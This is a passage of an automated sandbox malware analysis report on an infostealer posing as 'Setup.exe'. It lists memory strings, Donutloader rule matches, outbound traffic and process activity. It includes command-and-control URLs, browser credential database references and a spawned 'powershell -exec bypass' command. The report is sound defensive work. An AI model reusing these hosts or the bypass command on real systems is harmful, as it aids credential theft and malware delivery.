              Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: Setup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903279526.000000000104B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1951085152.000000000105C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1905498616.000000000104D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click/
              Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click/aN
              Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903248864.00000000038A9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851695824.00000000038B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click/api
              Source: Setup.exe, 00000000.00000003.1851207669.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851695824.00000000038B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click/apiA
              Source: Setup.exe, 00000000.00000003.1909177966.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1995816294.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click/apiN
              Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click/apih3=
              Source: Setup.exe, 00000000.00000003.1876780873.00000000038AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1874200327.00000000038AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click/apij
              Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click/asse
              Source: Setup.exe, 00000000.00000003.1909177966.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click:443/api
              Source: Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click:443/api2o4p.default-release/key4.dbPK
              Source: Setup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click:443/apiN
              Source: Setup.exe, 00000000.00000003.1909177966.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beefshooti.click:443/apim
              Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: Setup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/
              Source: Setup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/hB
              Source: Setup.exe, 00000000.00000003.1996461951.000000000105E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1998761099.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txt
              Source: Setup.exe, 00000000.00000002.1998349657.000000000100D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txtDZ
              Source: Setup.exe, 00000000.00000003.1996461951.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txtS
              Source: Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop:443/int_clp_ldr_sha.txt
              Source: Setup.exe, 00000000.00000002.1998349657.0000000001033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
              Source: Setup.exe, 00000000.00000002.1998349657.0000000001033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txtM
              Source: Setup.exe, 00000000.00000003.1995816294.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txtf5
              Source: Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop:443/sdgjyut/psh.txt
              Source: powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: Setup.exe, 00000000.00000003.1825717607.0000000003901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Setup.exe, 00000000.00000003.1825827041.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851951201.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1825717607.00000000038FF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851091316.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851360446.00000000038F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Setup.exe, 00000000.00000003.1825827041.00000000038D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Setup.exe, 00000000.00000003.1825827041.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851951201.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1825717607.00000000038FF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851091316.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851360446.00000000038F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Setup.exe, 00000000.00000003.1825827041.00000000038D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Setup.exeString found in binary or memory: https://www.innosetup.com/
              Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: Setup.exeString found in binary or memory: https://www.remobjects.com/ps
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.27.229:443 -> 192.168.2.4:49744 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F9B3DF NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_00F9B3DF
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0102FC450_3_0102FC45
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0102FC450_3_0102FC45
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392768F0_3_0392768F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392768F0_3_0392768F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392768F0_3_0392768F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_039275700_3_03927570
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_039275700_3_03927570
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_039275700_3_03927570
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03926C600_3_03926C60
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03926C600_3_03926C60
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03926C600_3_03926C60
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0102FC450_3_0102FC45
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0102FC450_3_0102FC45
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392768F0_3_0392768F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392768F0_3_0392768F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392768F0_3_0392768F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_039275700_3_03927570
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_039275700_3_03927570
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_039275700_3_03927570
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03926C600_3_03926C60
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03926C600_3_03926C60
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03926C600_3_03926C60
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392768F0_3_0392768F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392768F0_3_0392768F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0392768F0_3_0392768F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_039276280_3_03927628
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_039276C80_3_039276C8
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_039275700_3_03927570
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_039275700_3_03927570
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_039275700_3_03927570
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03926C600_3_03926C60
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03926C600_3_03926C60
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03926C600_3_03926C60
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03926C6A0_3_03926C6A
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F9B3DF0_2_00F9B3DF
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5041F0_2_00F5041F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5C0EC0_2_00F5C0EC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F7C0570_2_00F7C057
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F8701C0_2_00F8701C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F8E00C0_2_00F8E00C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F500000_2_00F50000
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F7300C0_2_00F7300C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5719C0_2_00F5719C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5515C0_2_00F5515C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6B12C0_2_00F6B12C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F822FC0_2_00F822FC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6F2FC0_2_00F6F2FC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6A2900_2_00F6A290
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F852710_2_00F85271
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6323C0_2_00F6323C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6023C0_2_00F6023C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F773EC0_2_00F773EC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F7D3D10_2_00F7D3D1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6C3CC0_2_00F6C3CC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F803900_2_00F80390
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5438C0_2_00F5438C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F8735C0_2_00F8735C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F864E30_2_00F864E3
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F8A4AC0_2_00F8A4AC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5B4850_2_00F5B485
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5644C0_2_00F5644C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F825BC0_2_00F825BC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6F64C0_2_00F6F64C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5E6380_2_00F5E638
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F8D62C0_2_00F8D62C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F627C40_2_00F627C4
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F8A79C0_2_00F8A79C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5472C0_2_00F5472C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F7270C0_2_00F7270C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5A8EC0_2_00F5A8EC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6F87C0_2_00F6F87C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6580C0_2_00F6580C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F579FC0_2_00F579FC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F869CC0_2_00F869CC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F7097C0_2_00F7097C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F8D94C0_2_00F8D94C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5992C0_2_00F5992C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5DA5C0_2_00F5DA5C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F79BE90_2_00F79BE9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6EBCC0_2_00F6EBCC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6AB9F0_2_00F6AB9F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F55B0C0_2_00F55B0C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F59CEC0_2_00F59CEC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F68CEB0_2_00F68CEB
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F80CCC0_2_00F80CCC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F61C960_2_00F61C96
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F8DC9C0_2_00F8DC9C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F58C6C0_2_00F58C6C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F86C2C0_2_00F86C2C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F87DEC0_2_00F87DEC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5AD0C0_2_00F5AD0C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F6EEEC0_2_00F6EEEC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F57E8C0_2_00F57E8C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F89FEC0_2_00F89FEC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F74F8C0_2_00F74F8C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F62F550_2_00F62F55
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F76F200_2_00F76F20
              Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 00F5972C appears 74 times
              Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 00F657FC appears 53 times
              Source: Setup.exeStatic PE information: invalid certificate
              Source: Setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: Setup.exeStatic PE information: Number of sections : 11 > 10
              Source: Setup.exe, 00000000.00000003.1774299719.00000000034B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Setup.exe
              Source: Setup.exe, 00000000.00000000.1676651530.0000000000B68000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Setup.exe
              Source: Setup.exeBinary or memory string: OriginalFileName vs Setup.exe
              Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/5@3/2
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F50B2F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_00F50B2F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1odyn1qj.bmh.ps1Jump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Setup.exe, 00000000.00000003.1825946179.00000000038A5000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1825429813.00000000038D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Setup.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: Setup.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: Setup.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: Setup.exeString found in binary or memory: /LoadInf=
              Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
              Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523Jump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
